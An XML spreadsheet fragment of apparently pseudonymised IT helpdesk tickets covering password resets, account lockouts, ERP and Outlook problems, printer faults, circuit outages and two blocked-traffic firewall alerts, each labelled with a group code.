    <s v="bsxvtpke vbfcashd_x000a_cell _x000a_system affected is dell laptop --outlook"/>
    <s v="bsxvtpke vbfcashd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1142 failed in job_scheduler at: 09/27/2016 12:05:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1142 failed in job_scheduler at: 09/27/2016 12:05:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="unable to connect to vpn"/>
    <s v="unable to connect to vpn"/>
    <s v="hjxtczwo wdrxmtqg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to company secure in usa"/>
    <s v="unable to connect to company secure in usa"/>
    <s v="horzelqj ujyzldmh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="update on ticket_no1555136 "/>
    <s v="name:dfgtyon stasrty_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:vsbtygin.oufhtbas@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:can we get this ticket ticket_no1555136 completed today?  i need to be able to get this site up.  thank u"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account unlock"/>
    <s v="account unlock"/>
    <s v="jqxtbspr mpfdivlh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_864348"/>
    <s v="ticket update on inplant_864348"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="inwarehouse_tools are not automatically being sent to helical when referenced to contracts"/>
    <s v="customer 81371659, sales org 1204, have inwarehouse_tools automatically set to be emailed, this works for standard orders, zkb and zke's order types, but when an order is referenced to a contract, they are not being transmitted, the partners in the order is correct, but on the inwarehouse_tool it is the same as the sold to party.  please see attached for examples."/>
    <s v="vcedphrq yajdpgnz"/>
    <x v="12"/>
  </r>
  <r>
    <s v="ticket update - inplant_862976"/>
    <s v="ticket update - inplant_862976"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="SID_37 password"/>
    <s v="_x000d__x000a__x000d__x000a_received from: czsmnbdi.ispdhfer@gmail.com_x000d__x000a__x000d__x000a_please reset my password in SID_37, see msg below._x000d__x000a__x000d__x000a_"/>
    <s v="czsmnbdi ispdhfer"/>
    <x v="0"/>
  </r>
  <r>
    <s v="hello, i am have problems running open sales backorder report data will not download past 9/22."/>
    <s v="hello, i am have problems running open sales backorder report data will not download past 9/22."/>
    <s v="bmixaeon mtaguhed"/>
    <x v="12"/>
  </r>
  <r>
    <s v="unable to login to skype"/>
    <s v="unable to login to skype"/>
    <s v="ugephfta hrbqkvij"/>
    <x v="0"/>
  </r>
  <r>
    <s v="programdnty zfiu0007 problem with credits not being issued on some accounts"/>
    <s v="we have some accounts where tax is not being issued and they are coded to the reason code 250 code that is part of this job.  i have attached examples.  "/>
    <s v="rhwsmefo tvphyura"/>
    <x v="9"/>
  </r>
  <r>
    <s v="unable to set up skype meetings"/>
    <s v="unable to set up skype meetings"/>
    <s v="keqvyfzw qwbohdxg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="rechner ewew8323527 \bluescreen \wrcktgbd wzrgyunp"/>
    <s v="rechner ewew8323527 \bluescreen \wrcktgbd wzrgyunp"/>
    <s v="wrcktgbd wzrgyunp"/>
    <x v="24"/>
  </r>
  <r>
    <s v="reinstall hardkopy we_wu116 \wrcktgbd wzrgyunp"/>
    <s v="reinstall hardkopy we_wu116 \wrcktgbd wzrgyunp"/>
    <s v="wrcktgbd wzrgyunp"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit hp4050 \fehler 41.1 \lxvunpiz mgjxwept"/>
    <s v="probleme mit hp4050 \fehler 41.1 \lxvunpiz mgjxwept"/>
    <s v="lxvunpiz mgjxwept"/>
    <x v="24"/>
  </r>
  <r>
    <s v="rechner ewew8323612 sehr langsam .\lxvunpiz mgjxwept"/>
    <s v="rechner ewew8323612 sehr langsam .\lxvunpiz mgjxwept"/>
    <s v="lxvunpiz mgjxwept"/>
    <x v="24"/>
  </r>
  <r>
    <s v="setup new ws \sgnubadl gpkovbah"/>
    <s v="setup new ws \sgnubadl gpkovbah"/>
    <s v="sgnubadl gpkovbah"/>
    <x v="24"/>
  </r>
  <r>
    <s v="unable to connect to tc78 and tc19"/>
    <s v="unable to connect to tc78 and tc19"/>
    <s v="arjpdohf mrqwdtil"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 password reset done. "/>
    <s v="erp SID_34 password reset done. "/>
    <s v="upcajlmd uqsbmiea"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked."/>
    <s v="account locked."/>
    <s v="sygionua szunhced"/>
    <x v="33"/>
  </r>
  <r>
    <s v="password is not getting synchronized."/>
    <s v="password is not getting synchronized."/>
    <s v="keqldvig hmiyeobl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passsw erp SID_34 - user: almrgtyeiba"/>
    <s v="hi team,_x000d__x000a__x000d__x000a_could you please reset passw the erp SID_34 user: almrgtyeiba (gvtbduyf gdblxiva) only erp._x000d__x000a__x000d__x000a_tnks"/>
    <s v="qasdhyzm yuglsrwx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to launch outlook after resetting the password"/>
    <s v="unable to launch outlook after resetting the password"/>
    <s v="keqldvig hmiyeobl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="crm plugin not responding"/>
    <s v="crm plugin not responding"/>
    <s v="owlgqjme qhcozdfx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="urgent: crm mailbox is not synchronising"/>
    <s v="urgent: crm mailbox is not synchronising. got a call from vitalyst. they've checked the crm sync settings and say that everything is in order. however, the crm mailbox is not synching. not accepting the username password too._x000d__x000a__x000d__x000a_phone: 214 70sartlgeo lhqksbdx617"/>
    <s v="crjhotyk pxslorbe"/>
    <x v="39"/>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hr14 on HostName_769_x000d__x000a_ _x000d__x000a_   â€¢  detailed description of the problem ? keeps asking for a driver install but will not install driver update_x000d__x000a__x000d__x000a_   â€¢  type of documents not printing?  all tried_x000d__x000a_   _x000d__x000a__x000d__x000a_   â€¢  what system or application being used at time of the problem?      windows_x000d__x000a__x000d__x000a_   â€¢  if not printing at all, does it respond to a ping command on the network and has a power cycle of the printer been completed? turned off and on printer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owhuxbnf sxbgyrou"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to get the crm app on outlook"/>
    <s v="unable to get the crm app on outlook"/>
    <s v="fydosbih lafdsumb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="termination for user lisfgta geitrhybler"/>
    <s v="termination for user lisfgta geitrhybler_x000a__x000a__x000a_hello , _x000a__x000a_a kÃ¼ndigung for liuytre geiÃŸler, 2111761255, effective 16.09.2016 has been approved. _x000a__x000a_click the link to view. _x000a__x000a_"/>
    <s v="mobaidfx gviwlsrm"/>
    <x v="19"/>
  </r>
  <r>
    <s v="pls reset windows password for user vvkertgipn"/>
    <s v="pls reset windows password for user vvkertgipn"/>
    <s v="vwpxjtof vmidzswj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="call for ecwtrjnq jpecxuty"/>
    <s v="call for ecwtrjnq jpecxuty"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="employee termination foulgnmdia pgsqwrumh langmar"/>
    <s v="hello , _x000a__x000a_a kÃ¼ndigung foulgnmdia pgsqwrumh langmar, 2111451235, effective 26.08.2016 has been approved. _x000a__x000a_click the link to view_x000a_"/>
    <s v="mobaidfx gviwlsrm"/>
    <x v="19"/>
  </r>
  <r>
    <s v="unable to sign in to vpn"/>
    <s v="unable to sign in to vpn"/>
    <s v="ncjispka wspgujxm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="probleme bei der projekt eingabe im collaboration_platform / infopath"/>
    <s v="dear it,_x000d__x000a__x000d__x000a_still some issues with the tracker even with your message in collaboration_tool etc._x000d__x000a__x000d__x000a_jertyur can difozlav dgbfptos make a ticket and contact you or some other person?_x000d__x000a__x000d__x000a_they cannot enter any projects._x000d__x000a__x000d__x000a_please let us know._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_--_x000d__x000a_mit freundlichen grÃ¼ÃŸen/ best "/>
    <s v="difozlav dgbfptos"/>
    <x v="0"/>
  </r>
  <r>
    <s v="lean tracker problems"/>
    <s v="hello it helpdesk,_x000d__x000a__x000d__x000a_good morning._x000d__x000a_i am not able to add new project into collaboration_platform lean tracker (contacting you, the helpdesk as per instruction from below mail). _x000d__x000a__x000d__x000a_ _x000d__x000a_"/>
    <s v="dshferby houtnzdi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="inc1553541 - ticket update"/>
    <s v="inc1553541 - ticket update"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="procenter login credential for new joiner"/>
    <s v="please create procenter login credential for below new joiners._x000a__x000a_name:keyhuerthi vtyr_x000a_user id:reddatrhykv_x000a__x000a_"/>
    <s v="utyeofsk rdyzpwhi"/>
    <x v="36"/>
  </r>
  <r>
    <s v="access to teams drive - folder sox self-assessments - user priflhtret"/>
    <s v="need access to folder sox self-assessments for quaterly sox requests_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="bayxwszc oiedajqz"/>
    <x v="33"/>
  </r>
  <r>
    <s v="job bk_hana_SID_22_arc_dp failed in job_scheduler at: 09/27/2016 06:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bk_hana_SID_22_arc_dp failed in job_scheduler at: 09/27/2016 06:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="r3ad hr queues stuck in SID_39 - 21k entries"/>
    <s v="hr employee data is not replicated - got stuck in SID_39"/>
    <s v="kgytujhe bonhwzrx"/>
    <x v="14"/>
  </r>
  <r>
    <s v="probleme mit druecker mp16"/>
    <s v="probleme mit druecker mp16_x000d__x000a__x000d__x000a_fehlermeldung: &quot;transport einheit fehlt, oder motor fehler aufgetreten_x000d__x000a_das ist eine leasing druecker."/>
    <s v="txkgmwbc qohmgwrp"/>
    <x v="32"/>
  </r>
  <r>
    <s v="unable to login to erp"/>
    <s v="misplaced password"/>
    <s v="uaclgmeq hyxzmwdi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="security incidents - ( #in33976733) : suspicious ms-rpc/ms-ds/netbios activity - android-ba50a4497de455a"/>
    <s v="source ip: 10.16.90.249_x000d__x000a_source hostname: android-ba50a4497de455a_x000d__x000a_source port: 55198_x000d__x000a_source mac address: 50:2e:5c:f0:f6:98_x000d__x000a_system name :_x000d__x000a_user  name:_x000d__x000a_location :_x000d__x000a_sep , sms status :_x000d__x000a_field sales user ( yes / no) :  _x000d__x000a_dsw event log:_x000d__x000a_-------------------------------------------------------------------------------------------------------------_x000d__x000a_=========================_x000d__x000a_event data_x000d__x000a_=========================_x000d__x000a_related events: _x000d__x000a_event id: 84682727_x000d__x000a_event summary: internal outbreak for 137/udp_x000d__x000a_occurrence count: 505_x000d__x000a_event count: 1_x000d__x000a__x000d__x000a_host and connection information_x000d__x000a_source ip: 10.16.90.249_x000d__x000a_source hostname: android-ba50a4497de455a_x000d__x000a_source port: 55198_x000d__x000a_source mac address: 50:2e:5c:f0:f6:98_x000d__x000a_destination hostname: [no entry]_x000d__x000a_destination port: 137_x000d__x000a_connection directionality: internal_x000d__x000a_protocol: udp_x000d__x000a__x000d__x000a_device information_x000d__x000a_device ip: 80.71.06.702_x000d__x000a_device name: company-european-asa.company.com-1_x000d__x000a_log time: 2016-09-26 at 08:23:55 utc_x000d__x000a_action: blocked_x000d__x000a_cvss score: -1 _x000d__x000a__x000d__x000a_scwx event processing information_x000d__x000a_sherlock rule id (sle): 537074_x000d__x000a_inspector rule id: 186739_x000d__x000a_inspector event id: 639601949_x000d__x000a_ontology id: 200020003203009162_x000d__x000a_event type id: 200020003203009062_x000d__x000a_agent id: 103761_x000d__x000a__x000d__x000a_event detail:_x000d__x000a_sep 26 08:23:55 80.71.06.702 %asa-4-106023: deny udp src inside:10.16.90.249/55198 dst noris:100.74.211.4/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3/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5/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6/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7/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8/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2/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0/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1/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3/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5/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6/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9/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2/137 by access-group &quot;acl_inside&quot; [0x30e3d92a, 0x0]_x000d__x000a__x000d__x000a_[correlation_data]_x000d__x000a_sep 26 04:23:54 60.43.89.120 dhcpd[23598]: dhcpack on 10.16.90.249 to 50:2e:5c:f0:f6:98 (android-ba50a4497de455a) via eth2 relay 10.16.88.2 lease-duration 691200 (renew)_x000d__x000a_sep 26 08:23:55 80.71.06.702 %asa-4-106023: deny udp src inside:10.16.90.249/55198 dst noris:100.74.211.14/137 by access-group &quot;acl_inside&quot; [0x30e3d92a, 0x0]_x000d__x000a__x000d__x000a_[correlation_data]_x000d__x000a_sep 26 04:23:54 60.43.89.120 dhcpd[23598]: dhcpack on 10.16.90.249 to 50:2e:5c:f0:f6:98 (android-ba50a4497de455a) via eth2 relay 10.16.88.2 lease-duration 691200 (renew)_x000d__x000a__x000d__x000a_ascii packet(s):_x000d__x000a_[no entry]_x000d__x000a__x000d__x000a_hex packet(s):_x000d__x000a_[no entry]"/>
    <s v="gzhapcld fdigznbk"/>
    <x v="55"/>
  </r>
  <r>
    <s v="security incidents - ( #in33984033) : internal outbreak for port 7 from awyl8911000/10.44.167.92"/>
    <s v="source ip :_x000d__x000a_system name :_x000d__x000a_user  name:_x000d__x000a_location :_x000d__x000a_sep , sms status :_x000d__x000a_field sales user ( yes / no) :  _x000d__x000a_dsw event log:_x000d__x000a_==================================================_x000d__x000a_=========================_x000d__x000a_event data_x000d__x000a_=========================_x000d__x000a_related events: _x000d__x000a_event id: 95389376_x000d__x000a_event summary: internal outbreak for 7/udp_x000d__x000a_occurrence count: 254_x000d__x000a_event count: 1_x000d__x000a__x000d__x000a_host and connection information_x000d__x000a_source ip: 10.44.167.92_x000d__x000a_source hostname: awyl8911000 _x000d__x000a_source port: 61814_x000d__x000a_source mac address: 0a:f5:c1:ab:82:b3:00:00:00:00:00:00:00:00:00:00_x000d__x000a_destination hostname:_x000d__x000a_destination port: 7_x000d__x000a_connection directionality: internal_x000d__x000a_protocol: udp_x000d__x000a__x000d__x000a_device information_x000d__x000a_device ip: 54.96.80.216_x000d__x000a_device name: att-apac-asa.company.com-1_x000d__x000a_log time: 2016-09-27 at 04:07:44 utc_x000d__x000a_action: blocked_x000d__x000a_cvss score: -1 _x000d__x000a__x000d__x000a_scwx event processing information_x000d__x000a_sherlock rule id (sle): 575501_x000d__x000a_inspector rule id: 186739_x000d__x000a_inspector event id: 893515308_x000d__x000a_ontology id: 200020003203009162_x000d__x000a_event type id: 200020003203009062_x000d__x000a_agent id: 103955_x000d__x000a__x000d__x000a_event detail:_x000d__x000a_sep 27 04:07:44 54.96.80.216 %asa-4-106023: deny udp src inside:10.44.167.92/61814 dst outside:192.168.0.1/7 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a__x000d__x000a_[correlation_data]_x000d__x000a_sep 27 00:07:25 46.45.62.5146 dhcpd[21574]: dhcpack on 10.44.167.92 to 0a:f5:c1:ab:82:b3:00:00:00:00:00:00:00:00:00:00 (awyl8911000) via eth2 relay 10.44.86.71 lease-duration 14400 (renew)_x000d__x000a_sep 27 04:07:44 54.96.80.216 %asa-4-106023: deny udp src inside:10.44.167.92/61812 dst outside:100.87.127.110/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5 dst outside:192.168.0.2/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6 dst outside:192.168.0.3/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7 dst outside:192.168.0.4/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8 dst outside:192.168.0.5/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19 dst outside:192.168.0.6/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0 dst outside:192.168.0.7/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1 dst outside:192.168.0.8/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2 dst outside:37.07.71.825/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3 dst outside:192.168.0.10/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4 dst outside:192.168.0.11/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5 dst outside:51.64.73.461/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6 dst outside:192.168.0.13/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7 dst outside:192.168.0.14/7 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a__x000d__x000a_[correlation_data]_x000d__x000a_sep 27 00:07:25 46.45.62.5146 dhcpd[21574]: dhcpack on 10.44.167.92 to 0a:f5:c1:ab:82:b3:00:00:00:00:00:00:00:00:00:00 (awyl8911000) via eth2 relay 10.44.86.71 lease-duration 14400 (renew)_x000d__x000a_sep 27 04:10:29 54.96.80.216 %asa-4-106023: deny udp src inside:10.44.167.92/57428 dst outside:192.168.0.15/7 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a__x000d__x000a_[correlation_data]_x000d__x000a_sep 27 00:07:25 46.45.62.5146 dhcpd[21574]: dhcpack on 10.44.167.92 to 0a:f5:c1:ab:82:b3:00:00:00:00:00:00:00:00:00:00 (awyl8911000) via eth2 relay 10.44.86.71 lease-duration 14400 (renew)_x000d__x000a__x000d__x000a_ascii packet(s):_x000d__x000a__x000d__x000a__x000d__x000a_hex packet(s):"/>
    <s v="gzhapcld fdigznbk"/>
    <x v="18"/>
  </r>
  <r>
    <s v="kfdyzexr hnbetvfk : password reset"/>
    <s v="kfdyzexr hnbetvfk : password reset"/>
    <s v="xvwchsdg pladjmxt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to create delivery"/>
    <s v="please provide the following:_x000d__x000a__x000d__x000a_what order number? 35066374/000030_x000d__x000a__x000d__x000a_what material or item number? 7415836_x000d__x000a__x000d__x000a_what warehouse location? plant_69_x000d__x000a__x000d__x000a_issue description / error message? create delivery not allowed (sys. status exls, object vb0035066374000030)"/>
    <s v="aztqelgy fqnkuxvw"/>
    <x v="5"/>
  </r>
  <r>
    <s v="mobile device activation "/>
    <s v="mobile device activation "/>
    <s v="ayktfvjr soghziec"/>
    <x v="0"/>
  </r>
  <r>
    <s v="po language is incorrect-po#4505652547"/>
    <s v="from: xjvubmlq vyamhjip _x000d__x000a_sent: tuesday, september 27, 2016 10:18 am_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_subject: rad:po language is incorrect-po#5616763658_x000d__x000a__x000d__x000a_hello ,_x000d__x000a_the po language is correct when i print output it ._x000d__x000a_ _x000d__x000a__x000d__x000a__x000d__x000a_ _x000d__x000a__x000d__x000a_but when i use &quot;zz_mails &quot;, the po language is incorrect, could you please help to check it?_x000d__x000a_ _x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_ _x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_with best "/>
    <s v="xjvubmlq vyamhjip"/>
    <x v="29"/>
  </r>
  <r>
    <s v="reset the password for pumjbcna scluvtyj on erp / qa / hcm"/>
    <s v="hi all,_x000a__x000a_the user romertanj need their password reset._x000a__x000a_"/>
    <s v="pumjbcna scluvtyj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for pumjbcna scluvtyj using password_management_tool password reset."/>
    <s v="hi all,_x000d__x000a__x000d__x000a_please, the user romertanj need their password reset._x000d__x000a__x000d__x000a_"/>
    <s v="pumjbcna scluvtyj"/>
    <x v="16"/>
  </r>
  <r>
    <s v="outlook not getting connected to exchange server"/>
    <s v="outlook not getting connected to exchange server"/>
    <s v="ayktfvjr soghziec"/>
    <x v="0"/>
  </r>
  <r>
    <s v="urgent // price update error "/>
    <s v="_x000d__x000a__x000d__x000a_received from: uarnkqps.gufcjxma@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_i have to divide the quantity of the item due to partial shipment and currency issue. but while dividing item quantity and re-writing zno for currency update process, zno price is deleted._x000d__x000a_i try to enter the price again with zno however the system can't allow it and bring the new price with zcnp._x000d__x000a__x000d__x000a_so could you help me please?_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_[cid:image002.jpg@01SID_358a8.eb5a4620]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_saygÄ±larÄ±mÄ±zla / best "/>
    <s v="uarnkqps gufcjxma"/>
    <x v="12"/>
  </r>
  <r>
    <s v="erp SID_34 account locked"/>
    <s v="erp SID_34 account locked"/>
    <s v="fjetbklw oeuawsbq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="drucker dell 1350 cnw druckt alle seiten mit grauschleiher"/>
    <s v="druckt druckt alles vergraut"/>
    <s v="wgmnjxft zeyhasdj"/>
    <x v="32"/>
  </r>
  <r>
    <s v="finance_app"/>
    <s v="_x000d__x000a__x000d__x000a_received from: bujiesrg.zopcrshl@gmail.com_x000d__x000a__x000d__x000a_dear allï¼Œ_x000d__x000a__x000d__x000a_can you help me to access below forms? "/>
    <s v="bujiesrg zopcrshl"/>
    <x v="54"/>
  </r>
  <r>
    <s v="password for w-lan anrgtdy bofffgtyin"/>
    <s v="_x000a__x000a_received from: dubpgacz.kjzhilng@gmail.com_x000a__x000a_hello,_x000a__x000a_my college anrgtdy bofffgtyin came to germany, germany fort he work and needs to connect to w-lan._x000a__x000a__x000a_could you please send him password for guest w-lan connetction?_x000a__x000a_anrgtdy bofffgtyin_x000a_technical programdntyme manager aerospace and defence_x000a_godjevmy.gfaevrdq@gmail.com&lt;mailto:godjevmy.gfaevrdq@gmail.com&gt;_x000a__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="dubpgacz kjzhilng"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked in ad"/>
    <s v="account locked in ad"/>
    <s v="adxuzbcv uojxrivy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="help to pose the 4 pos which cannot be posed by erp now"/>
    <s v="when the 4 pos are posed, as the local tax law, we need choose j0 for them. however, after we choose j0 as tax code, erp shows red message like the attachments. then we make tax code empty, erp will require to place a tax code. this make us confused how to pose this 4 pos. please help to pose them. "/>
    <s v="dizquolf hlykecxa"/>
    <x v="9"/>
  </r>
  <r>
    <s v="account locked in supply_chain_software "/>
    <s v="account locked in supply_chain_software "/>
    <s v="rvdtagmf klbnhydo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="circuit outage:australia-dmvpn-1811-rtr02 down since 1:30 am on 9/27/2016 "/>
    <s v="what type of outage:  _____network     ___yes__circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___no______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _____1:30 am on 9/27/2016 _________________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? ___no____    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? _____no__    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000d__x000a__x000d__x000a_5. does site have a backup circuit ?  __yes___    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   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x v="7"/>
  </r>
  <r>
    <s v="final inwarehouse_tool for project is not working correctly"/>
    <s v="dear it team,_x000d__x000a__x000d__x000a_i have again an issue with a final inwarehouse_tool. i have the following erp order: 34827963._x000d__x000a_we had a down payment of all items, but a final shipment of item 10,20,50,60,70._x000d__x000a_items 30 and 40 have not been shipped, hence we are not allowed to do an final inwarehouse_tool for this. _x000d__x000a_so i tried to do a final inwarehouse_tool for items 10,20,50,60,70, but it did not work. with inwarehouse_tool 0159198781 the down payment amount got deducted twice. _x000d__x000a_so i cancelled all inwarehouse_tools, incl. down payment inwarehouse_tool and separated them, one inwarehouse_tool for item 10,20,50,60,70 and another inwarehouse_tool for item 30,40._x000d__x000a_after that i tried again to inwarehouse_tool it. but still the wrong amunt was shown. i need to have an inwarehouse_tool for item 10,20,50,60,70 with amount 350.740 minus 105.222 down paymant. can you please have a look and help me? _x000d__x000a_this is not a single issue, we had that already several times. "/>
    <s v="fmqubnvs kcxpeyiv"/>
    <x v="12"/>
  </r>
  <r>
    <s v="after changing the password,outlook is not responding to the newly assigned password."/>
    <s v="name:mandgtryjuth_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:onbugvhi.vzjfgckt@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:after changing the password,outlook is not responding to the newly assigned password."/>
    <s v="lfamubxq evgwkyix"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering_tool-new customer addition"/>
    <s v="_x000d__x000a__x000d__x000a_received from: skmdgnuh.utgclesd@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_still same error persists._x000d__x000a__x000d__x000a_[cid:image001.png@01SID_358ae.c667c030]_x000d__x000a__x000d__x000a_with warm "/>
    <s v="skmdgnuh utgclesd"/>
    <x v="25"/>
  </r>
  <r>
    <s v="hpqc account--reset password"/>
    <s v="_x000a__x000a_received from: phfduvwl.yqnaucep@gmail.com_x000a__x000a_hello_x000a_i failed to login my hpqc account and got below message._x000a_could you please reset password for my hpqc account, i need it to do uacyltoe hxgaycze next week_x000a_my user id is zhudrs_x000a__x000a_[cid:image001.png@01SID_358c2.0b26f430]_x000a_"/>
    <s v="phfduvwl yqnaucep"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to open outlook and business_client "/>
    <s v="unable to open outlook and business_client "/>
    <s v="otpkzifh gywinoml"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ç”µè„‘ç¡¬ç›˜æ•…éšœï¼Œè¯·æ±‚ç»´ä¿®ã€‚"/>
    <s v="ç”µè„‘ç¡¬ç›˜æ•…éšœï¼Œè¯·æ±‚ç»´ä¿®ã€‚"/>
    <s v="ruhbyzpv vlksnjti"/>
    <x v="30"/>
  </r>
  <r>
    <s v="business_client not working"/>
    <s v="_x000d__x000a__x000d__x000a_received from: otpkzifh.gywinoml@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i am unable to access business_client. when i open business_client, it goes directly into below screen._x000d__x000a_kindly look into._x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.jpg@01SID_358ac.6fbbdcf0]_x000d__x000a__x000d__x000a_"/>
    <s v="otpkzifh gywinoml"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_3190 failed in job_scheduler at: 09/27/2016 01:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3190 failed in job_scheduler at: 09/27/2016 01:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="the plm conversion server - is reporting a : warning status on, HostName_108. please investigate"/>
    <s v="the plm conversion server - is reporting a : warning status on, HostName_108. please investigate_x000a_"/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="13"/>
  </r>
  <r>
    <s v="add the inxsupmy zhwmifvx to materials_management / purchasing"/>
    <s v="_x000a__x000a_received from: inxsupmy.zhwmifvx@gmail.com_x000a__x000a_hello team,_x000a__x000a_can you please add inxsupmy zhwmifvx  to the materials_management/purchasing group in ticketing_tool ._x000a__x000a_inxsupmy zhwmifvx_x000a_team lead - ssl (sourcing &amp; logistics) - global it_x000a_inxsupmy.zhwmifvx@gmail.com_x000a__x000a__x000a__x000a_"/>
    <s v="inxsupmy zhwmifvx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp login blocked"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ublisodp.qydfvpgw@gmail.com_x000d__x000a__x000d__x000a_hello_x000d__x000a__x000d__x000a_i am not able to login into erp as my attempts exceed the set limit._x000d__x000a_requesting you to unblock the same._x000d__x000a__x000d__x000a_"/>
    <s v="ublisodp qydfvpgw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook is not updating on my laptop"/>
    <s v="name:warrrtyen_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:wmybrona.qvwhpamb@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:outlook is not updating on my laptop"/>
    <s v="wmybrona qvwhpamb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="circuit outage : carrier india dmvpn-rtr02 is down since 10:37 pm et on 09/26."/>
    <s v="what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ____________10:37 pm et on 09/26.__________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? _____no__    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? _____no__    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000d__x000a__x000d__x000a_5. does site have a backup circuit ?  ___yes___    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   _____yes___     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  _____no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erp SID_34 account locked "/>
    <s v="erp SID_34 account locked "/>
    <s v="iwqfelcu gsubfiml"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account locked "/>
    <s v="erp SID_34 account locked "/>
    <s v="dbhwzfxy amhowrfk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="sound system of laptop"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ygkzwsud.cvjgkxws@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i need a help, the sound system of my laptop doesn't seem to be working, neither through speaker nor through ear phone. it's very inconvenient for skype calls._x000d__x000a__x000d__x000a_please look into this._x000d__x000a__x000d__x000a_"/>
    <s v="ygkzwsud cvjgkxws"/>
    <x v="18"/>
  </r>
  <r>
    <s v="erp login trouble"/>
    <s v="_x000d__x000a__x000d__x000a_received from: xosycftu.olhpmsdw@gmail.com_x000d__x000a__x000d__x000a_hello_x000d__x000a__x000d__x000a_please see this error._x000d__x000a_i can not log in erp._x000d__x000a_please tell me the solution._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="xosycftu olhpmsdw"/>
    <x v="0"/>
  </r>
  <r>
